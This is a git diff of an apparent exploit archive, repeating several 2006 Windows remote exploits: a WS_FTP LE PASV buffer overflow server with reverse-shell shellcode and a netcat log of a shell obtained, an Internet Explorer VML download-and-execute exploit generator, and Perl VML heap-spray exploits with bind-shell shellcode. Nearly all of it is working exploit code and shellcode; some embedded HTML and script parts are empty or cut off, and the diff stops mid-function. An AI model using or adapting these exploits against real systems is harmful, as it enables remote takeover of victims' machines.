+[+] Listening on 21
+[+] Connection accepted from 192.168.0.3
+[+] Client request: USER h07
+[+] Client request: PWD
+[+] Client request: SYST
+[+] Client request: HELP
+[+] Client request: PASV
+[+] Sending buffer: OK
+[*] Press enter to quit
+
+C:\>nc -v -l -p 4444
+listening on [any] 4444 ...
+connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
+Microsoft Windows 2000 [Wersja 5.00.2195]
+(C) Copyright 1985-2000 Microsoft Corp.
+
+C:\Program Files\WS_FTP>
+*/
+
+#include 
+#define PORT 21
+#define BUFF_SIZE 1024
+#define RESPONSE "200 blah blah\r\n"
+
+typedef struct
+ {
+ char os_name[32];
+ unsigned long ret;
+ } target;
+
+char shellcode[] =
+/*
+win32 reverse shellcode (thx metasploit.com)
+bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29
+*/
+"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x87"
+"\x61\xbc\xd8\x83\xeb\xfc\xe2\xf4\x7b\x0b\x57\x95\x6f\x98\x43\x27"
+"\x78\x01\x37\xb4\xa3\x45\x37\x9d\xbb\xea\xc0\xdd\xff\x60\x53\x53"
+"\xc8\x79\x37\x87\xa7\x60\x57\x91\x0c\x55\x37\xd9\x69\x50\x7c\x41"
+"\x2b\xe5\x7c\xac\x80\xa0\x76\xd5\x86\xa3\x57\x2c\xbc\x35\x98\xf0"
+"\xf2\x84\x37\x87\xa3\x60\x57\xbe\x0c\x6d\xf7\x53\xd8\x7d\xbd\x33"
+"\x84\x4d\x37\x51\xeb\x45\xa0\xb9\x44\x50\x67\xbc\x0c\x22\x8c\x53"
+"\xc7\x6d\x37\xa8\x9b\xcc\x37\x98\x8f\x3f\xd4\x56\xc9\x6f\x50\x88"
+"\x78\xb7\xda\x8b\xe1\x09\x8f\xea\xef\x16\xcf\xea\xd8\x35\x43\x08"
+"\xef\xaa\x51\x24\xbc\x31\x43\x0e\xd8\xe8\x59\xbe\x06\x8c\xb4\xda"
+"\xd2\x0b\xbe\x27\x57\x09\x65\xd1\x72\xcc\xeb\x27\x51\x32\xef\x8b"
+"\xd4\x22\xef\x9b\xd4\x9e\x6c\xb0\x87\x61\xbc\xd8\xe1\x09\xbc\xd8"
+"\xe1\x32\x35\x39\x12\x09\x50\x21\x2d\x01\xeb\x27\x51\x0b\xac\x89"
+"\xd2\x9e\x6c\xbe\xed\x05\xda\xb0\xe4\x0c\xd6\x88\xde\x48\x70\x51"
+"\x60\x0b\xf8\x51\x65\x50\x7c\x2b\x2d\xf4\x35\x25\x79\x23\x91\x26"
+"\xc5\x4d\x31\xa2\xbf\xca\x17\x73\xef\x13\x42\x6b\x91\x9e\xc9\xf0"
+"\x78\xb7\xe7\x8f\xd5\x30\xed\x89\xed\x60\xed\x89\xd2\x30\x43\x08"
+"\xef\xcc\x65\xdd\x49\x32\x43\x0e\xed\x9e\x43\xef\x78\xb1\xd4\x3f"
+"\xfe\xa7\xc5\x27\xf2\x65\x43\x0e\x78\x16\x40\x27\x57\x09\x4c\x52"
+"\x83\x3e\xef\x27\x51\x9e\x6c\xd8";
+
+char buffer[BUFF_SIZE];
+
+target list[] =
+ {
+ "XP SP2 Polish",
+ 0x7d16887b, //JMP ESI
+
+ "2000 SP4 Polish",
+ 0x776f2015, //JMP ESI
+
+ "XP SP2 English",
+ 0x7cb9e082, //JMP ESI
+
+ "2000 SP4 English",
+ 0x7848a5f1, //JMP ESI
+
+ "XP SP2 German",
+ 0x7ca96834  //JMP ESI
+ };
+
+void config_shellcode(unsigned long ip, unsigned short port)
+ {
+ memcpy(&shellcode[184], &ip, 4);
+ memcpy(&shellcode[190], &port, 2);
+ }
+
+int main(int argc, char *argv[])
+{
+WSADATA wsa;
+int sock, cl, len, os, r_len, i,
+a = (sizeof(list) / sizeof(target)) - 1;
+unsigned long connectback_IP, eip;
+unsigned short connectback_port;
+struct sockaddr_in server, client;
+
+printf("\n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit\n");
+printf("[*] Coded by h07 \n");
+
+if(argc < 4)
+ {
+ printf("[*] Usage: %s   \n", argv[0]);
+ printf("[*] Sample: %s 0 192.168.0.1 4444\n", argv[0]);
+ printf("[*] Systems..\n");
+ for(i = 0; i <= a; i++)
+ printf("[>] %d: %s\n", i, list[i].os_name);
+ return 1;
+ }
+
+WSAStartup(MAKEWORD(2, 0), &wsa);
+
+os = atoi(argv[1]);
+
+if((os < 0) || (os > a))
+ {
+ printf("[-] Error: unknown target %d\n", os);
+ return -1;
+ }
+
+eip = list[os].ret;
+connectback_IP = inet_addr(argv[2]) ^ (ULONG)0xd8bc6187;
+connectback_port = htons(atoi(argv[3])) ^ (USHORT)0xd8bc;
+config_shellcode(connectback_IP, connectback_port);
+
+if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
+ {
+ printf("[-] Socket error\n");
+ return -1;
+ }
+
+server.sin_family = AF_INET;
+server.sin_addr.s_addr = htonl(INADDR_ANY);
+server.sin_port = htons(PORT);
+
+bind(sock, (struct sockaddr *) &server, sizeof(server));
+listen(sock, 1);
+
+printf("[+] Listening on %d\n", PORT);
+
+len = sizeof(client);
+cl = accept(sock, (struct sockaddr *) &client, &len);
+
+printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr));
+
+send(cl, "200 evil server ready :>\r\n", 26, 0);
+
+for(i = 0; i <= 3; i++)
+ {
+ memset(buffer, 0x00, BUFF_SIZE);
+ recv(cl, buffer, BUFF_SIZE - 1, 0);
+ printf("[+] Client request: %s", buffer);
+ send(cl, RESPONSE, strlen(RESPONSE), 0);
+ }
+
+//PASV request
+memset(buffer, 0x00, BUFF_SIZE);
+recv(cl, buffer, BUFF_SIZE - 1, 0);
+printf("[+] Client request: %s", buffer);
+
+//PASV response
+r_len = 1011;
+memset(buffer, 0x90, BUFF_SIZE);
+memcpy(buffer, "200 \x31\xc0", 6);
+memcpy(buffer + 6, shellcode, sizeof(shellcode) - 1);
+*((unsigned long*)(&buffer[r_len])) = eip;
+memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
+
+if(send(cl, buffer, strlen(buffer), 0) != -1)
+printf("[+] Sending buffer: OK\n");
+else
+printf("[-] Sending buffer: failed\n");
+
+printf("[*] Press enter to quit\n");
+getchar();
+
+return 0;
+}
+
+// milw0rm.com [2006-09-20]
diff --git a/platforms/windows/remote/2403.c b/platforms/windows/remote/2403.c
index a6bb4ff4a..3f47aa56b 100755
--- a/platforms/windows/remote/2403.c
+++ b/platforms/windows/remote/2403.c
@@ -1,207 +1,207 @@
-/*
-*-----------------------------------------------------------------------
-*
-* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
-* !!! 0day !!! Public Version !!!
-*
-* Copyright (C) 2006 XSec All Rights Reserved.
-*
-* Author : nop
-* : nop#xsec.org
-* : http://www.xsec.org
-* :
-* Tested : Windows 2000 Server CN
-* : + Internet Explorer 6.0 SP1
-* :
-* Complie : cl vml.c
-* :
-* Usage : d:\>vml
-* :
-* : Usage: vml  [htmlfile]
-* :
-* : d:\>vml http://xsec.org/xxx.exe xxx.htm
-* :
-*
-*------------------------------------------------------------------------
-*/
-
-#include 
-#include 
-#include 
-
-FILE *fp = NULL;
-char *file = "xsec.htm";
-char *url = NULL;
-
-#define NOPSIZE 260
-#define MAXURL 60
-
-//DWORD ret = 0x7Ffa4512; // call esp for CN
-DWORD ret = 0x7800CCDD; // call esp for All win2k
-
-// Search Shellcode
-unsigned char dc[] =
-"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
-"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";
-
-// Shellcode Start
-unsigned char dcstart[] =
-"noop";
-
-// Download Exec Shellcode XOR with 0xee
-unsigned char sc[] =
-"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
-"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
-"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
-"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
-"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
-"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
-"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
-"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
-"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
-"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
-"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
-"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
-"\xF4\xC1\x9E";
-
-// Shellcode End
-unsigned char dcend[] =
-"n00p";
-
-// HTML Header
-char * header =
-"\n"
-"\n"
-"XSec.org\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-;
-
-// convert string to NCR
-void convert2ncr(unsigned char * buf, int size)
-{
-	int i=0;
-	unsigned int ncr = 0;
-
-	for(i=0; i [htmlfile]\r\n\n", argv[0]);
-		exit(1);
-	}
-
-	url = argv[1];
-	if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
-			10 || strlen(url) > MAXURL)
-	{
-		printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL);
-		return;
-	}
-
-	printf("[+] download url:%s\n", url);
-
-	if(argc >=3) file = argv[2];
-
-	printf("[+] exploit file:%s\n", file);
-
-	fp = fopen(file, "w+b");
-	//fp = fopen(file, "w");
-	if(!fp)
-	{
-		printf("[-] Open file error!\n");
-		return;
-	}
-
-	// print html header
-	fprintf(fp, "%s", header);
-	fflush(fp);
-
-	for(i=0; ivml
+* :
+* : Usage: vml  [htmlfile]
+* :
+* : d:\>vml http://xsec.org/xxx.exe xxx.htm
+* :
+*
+*------------------------------------------------------------------------
+*/
+
+#include 
+#include 
+#include 
+
+FILE *fp = NULL;
+char *file = "xsec.htm";
+char *url = NULL;
+
+#define NOPSIZE 260
+#define MAXURL 60
+
+//DWORD ret = 0x7Ffa4512; // call esp for CN
+DWORD ret = 0x7800CCDD; // call esp for All win2k
+
+// Search Shellcode
+unsigned char dc[] =
+"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
+"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";
+
+// Shellcode Start
+unsigned char dcstart[] =
+"noop";
+
+// Download Exec Shellcode XOR with 0xee
+unsigned char sc[] =
+"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
+"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
+"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
+"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
+"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
+"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
+"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
+"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
+"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
+"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
+"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
+"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
+"\xF4\xC1\x9E";
+
+// Shellcode End
+unsigned char dcend[] =
+"n00p";
+
+// HTML Header
+char * header =
+"\n"
+"\n"
+"XSec.org\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+;
+
+// convert string to NCR
+void convert2ncr(unsigned char * buf, int size)
+{
+	int i=0;
+	unsigned int ncr = 0;
+
+	for(i=0; i [htmlfile]\r\n\n", argv[0]);
+		exit(1);
+	}
+
+	url = argv[1];
+	if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
+			10 || strlen(url) > MAXURL)
+	{
+		printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL);
+		return;
+	}
+
+	printf("[+] download url:%s\n", url);
+
+	if(argc >=3) file = argv[2];
+
+	printf("[+] exploit file:%s\n", file);
+
+	fp = fopen(file, "w+b");
+	//fp = fopen(file, "w");
+	if(!fp)
+	{
+		printf("[-] Open file error!\n");
+		return;
+	}
+
+	// print html header
+	fprintf(fp, "%s", header);
+	fflush(fp);
+
+	for(i=0; i
-#
-# http://sf-freedom.blogspot.com
-#
-# For educational purpose only
-#
-# Note: This exploit is modified from Shirkdog's PoC 
-# (http://www.milw0rm.com/exploits/2400)
-#
-# I exploit the stack-based buffer overflow in the different manner because of 
-# the problem of shellcode. I use heap spraying technique to injection my 
-# shellcode in the heap. Because I can control EIP so I tell it to jump into 
-# the heap that contains shellcode ^-^
-#
-# This exploit tested on: Windows XP SP1 + IE6 SP1 
-# 			  Windows XP SP0 + IE6
-#			  Windows 2000 SP4 + IE6 SP1
-#			  Windows 2000 SP4 + IE6
-#
-# I will describe more implementation details at my blog in this weekend :)
-#
-# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
-# This exploit is not success. The situation that overwrite to the location 
-# that eax point to is not occured, so I cannot use my techqniue 
-# "The Fake Cookie" that I use to break buffer overflow protection in 
-# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
-# with some techniques, plz share information :)
-#
-
-use strict;
-
-# win32_bind LPORT = 5555 - Metasploit
-my $shellcode =
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
-"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
-"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
-
-my $jscript =
-"";
-
-my $header =
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-$jscript .
-"\n" .
-"\n" ;
-
-my $footer =
-"\n" .
-"\n" .
-"";
-
-
-my $body1 = "\n" .
-"\n" .
-"\n" .
-"";
-
-my $page = "\xff\xfe";	# magic number of M$ unicode file
-my $c;
-
-# header + body1 
-foreach $c (split //, ($header . $body1)) {
-	$page = $page . $c . "\x00";
-}
-
-# padding + ret
-$page = $page . "\x41\x00" x (256) . # padding
-	"\x01\x0d\x0d\x0d" .	# writable memory
-	"\x44\x44\x44\x44" . 	# padding
-	"\x0d\x0d\x0d\x0d";	# return address
-
-# body2 + footer
-foreach $c (split //, ($body2 . $footer)) {
-	$page = $page . $c . "\x00";
-}
-
-open (IE_VML, ">", "exploit.html");
-
-print IE_VML $page;
-
-close IE_VML;
-
-# This function copy from JSUnescape() code in Metasploit
-sub convert_shellcode {
-	my $data = shift;
-	my $mode = shift() || 'LE';
-	my $code = '';
-	
-	# Encode the shellcode via %u sequences for JS's unescape() function
-	my $idx = 0;
-	
-	# Pad to an even number of bytes
-	if (length($data) % 2 != 0) {
-		$data .= substr($data, -1, 1);
-	}
-	
-	while ($idx < length($data) - 1) {
-		my $c1 = ord(substr($data, $idx, 1));
-		my $c2 = ord(substr($data, $idx+1, 1));	
-		if ($mode eq 'LE') {
-			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
-		} else {
-			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
-		}
-		$idx += 2;
-	}
-	
-	return $code;
-}
-
-# milw0rm.com [2006-09-21]
+#!/usr/bin/perl
+#
+# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
+# Windows 2000 SP4)
+#
+# Author: Trirat Puttaraksa (Kira) 
+#
+# http://sf-freedom.blogspot.com
+#
+# For educational purpose only
+#
+# Note: This exploit is modified from Shirkdog's PoC 
+# (http://www.milw0rm.com/exploits/2400)
+#
+# I exploit the stack-based buffer overflow in the different manner because of 
+# the problem of shellcode. I use heap spraying technique to injection my 
+# shellcode in the heap. Because I can control EIP so I tell it to jump into 
+# the heap that contains shellcode ^-^
+#
+# This exploit tested on: Windows XP SP1 + IE6 SP1 
+# 			  Windows XP SP0 + IE6
+#			  Windows 2000 SP4 + IE6 SP1
+#			  Windows 2000 SP4 + IE6
+#
+# I will describe more implementation details at my blog in this weekend :)
+#
+# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
+# This exploit is not success. The situation that overwrite to the location 
+# that eax point to is not occured, so I cannot use my techqniue 
+# "The Fake Cookie" that I use to break buffer overflow protection in 
+# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
+# with some techniques, plz share information :)
+#
+
+use strict;
+
+# win32_bind LPORT = 5555 - Metasploit
+my $shellcode =
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
+"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
+"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
+
+my $jscript =
+"";
+
+my $header =
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+$jscript .
+"\n" .
+"\n" ;
+
+my $footer =
+"\n" .
+"\n" .
+"";
+
+
+my $body1 = "\n" .
+"\n" .
+"\n" .
+"";
+
+my $page = "\xff\xfe";	# magic number of M$ unicode file
+my $c;
+
+# header + body1 
+foreach $c (split //, ($header . $body1)) {
+	$page = $page . $c . "\x00";
+}
+
+# padding + ret
+$page = $page . "\x41\x00" x (256) . # padding
+	"\x01\x0d\x0d\x0d" .	# writable memory
+	"\x44\x44\x44\x44" . 	# padding
+	"\x0d\x0d\x0d\x0d";	# return address
+
+# body2 + footer
+foreach $c (split //, ($body2 . $footer)) {
+	$page = $page . $c . "\x00";
+}
+
+open (IE_VML, ">", "exploit.html");
+
+print IE_VML $page;
+
+close IE_VML;
+
+# This function copy from JSUnescape() code in Metasploit
+sub convert_shellcode {
+	my $data = shift;
+	my $mode = shift() || 'LE';
+	my $code = '';
+	
+	# Encode the shellcode via %u sequences for JS's unescape() function
+	my $idx = 0;
+	
+	# Pad to an even number of bytes
+	if (length($data) % 2 != 0) {
+		$data .= substr($data, -1, 1);
+	}
+	
+	while ($idx < length($data) - 1) {
+		my $c1 = ord(substr($data, $idx, 1));
+		my $c2 = ord(substr($data, $idx+1, 1));	
+		if ($mode eq 'LE') {
+			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
+		} else {
+			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
+		}
+		$idx += 2;
+	}
+	
+	return $code;
+}
+
+# milw0rm.com [2006-09-21]
diff --git a/platforms/windows/remote/2425.html b/platforms/windows/remote/2425.html
index a090ea0a7..304ac4434 100755
--- a/platforms/windows/remote/2425.html
+++ b/platforms/windows/remote/2425.html
@@ -67,5 +67,5 @@ v\:* { behavior: url(#VMLRender); }
 
 
 
-                                                                                                                                                                                                                                
-# milw0rm.com [2006-09-24]
+                                                                                                                                                                                                                                
+# milw0rm.com [2006-09-24]
diff --git a/platforms/windows/remote/2426.pl b/platforms/windows/remote/2426.pl
index ee943e04c..96053c683 100755
--- a/platforms/windows/remote/2426.pl
+++ b/platforms/windows/remote/2426.pl
@@ -1,165 +1,165 @@
-#!/usr/bin/perl
-#
-# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2)
-#
-# Author: Trirat Puttaraksa (Kira) 
-#
-# Credits: Niega
-#
-# [UPDATE Sep 24]
-# At the first time, I decide to release this exploit on Oct 10.
-# However, if u see this exploit before Oct 10, it is because of one
-# of the following reason:
-# 	1. M$ release early than Oct 10 (may be impossible, lol)
-# 	2. there is someone already publish the exploit, so there is no means
-# 	   to still keep it private
-# I'm already publish things about XP SP2 in my log :)
-#
-# http://sf-freedom.blogspot.com
-#
-###############################################################################
-# For educational purpose only
-#
-# Note: This exploit is modified from Shirkdog's PoC 
-# (http://www.milw0rm.com/exploits/2400)
-#
-# I exploit the stack-based buffer overflow in the different manner because of 
-# the problem of shellcode. I use heap spraying technique to injection my 
-# shellcode in the heap. Because I can control EIP so I tell it to jump into 
-# the heap that contains shellcode ^-^
-#
-# This exploit tested on: 
-# 			  Windows XP SP2 + IE6 SP1
-# 			  Windows XP SP1 + IE6 SP1 
-# 			  Windows XP SP0 + IE6
-#			  Windows 2000 SP4 + IE6 SP1
-#			  Windows 2000 SP4 + IE6
-#
-# I will describe more implementation details at my blog in this weekend :)
-#
-# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
-# This exploit is not success. The situation that overwrite to the location 
-# that eax point to is not occured, so I cannot use my techqniue 
-# "The Fake Cookie" that I use to break buffer overflow protection in 
-# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
-# with some techniques, plz share information :)
-#
-
-use strict;
-
-# win32_bind LPORT = 5555 - Metasploit
-my $shellcode =
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
-"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
-"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
-
-my $jscript =
-"";
-
-my $header =
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-"\n" .
-$jscript .
-"\n" .
-"\n" ;
-
-my $footer =
-"\n" .
-"\n" .
-"";
-
-
-my $body1 = "\n" .
-"\n" .
-"\n" .
-"";
-
-my $page = "\xff\xfe";	# magic number of M$ unicode file
-my $c;
-
-# header + body1 
-foreach $c (split //, ($header . $body1)) {
-	$page = $page . $c . "\x00";
-}
-
-# very simple :)
-$page = $page . "\x0d\x0d\x0d\x0d" x 65535;
-
-# body2 + footer
-foreach $c (split //, ($body2 . $footer)) {
-	$page = $page . $c . "\x00";
-}
-
-open (IE_VML, ">", "exploit.html");
-
-print IE_VML $page;
-
-close IE_VML;
-
-# This function copy from JSUnescape() code in Metasploit
-sub convert_shellcode {
-	my $data = shift;
-	my $mode = shift() || 'LE';
-	my $code = '';
-	
-	# Encode the shellcode via %u sequences for JS's unescape() function
-	my $idx = 0;
-	
-	# Pad to an even number of bytes
-	if (length($data) % 2 != 0) {
-		$data .= substr($data, -1, 1);
-	}
-	
-	while ($idx < length($data) - 1) {
-		my $c1 = ord(substr($data, $idx, 1));
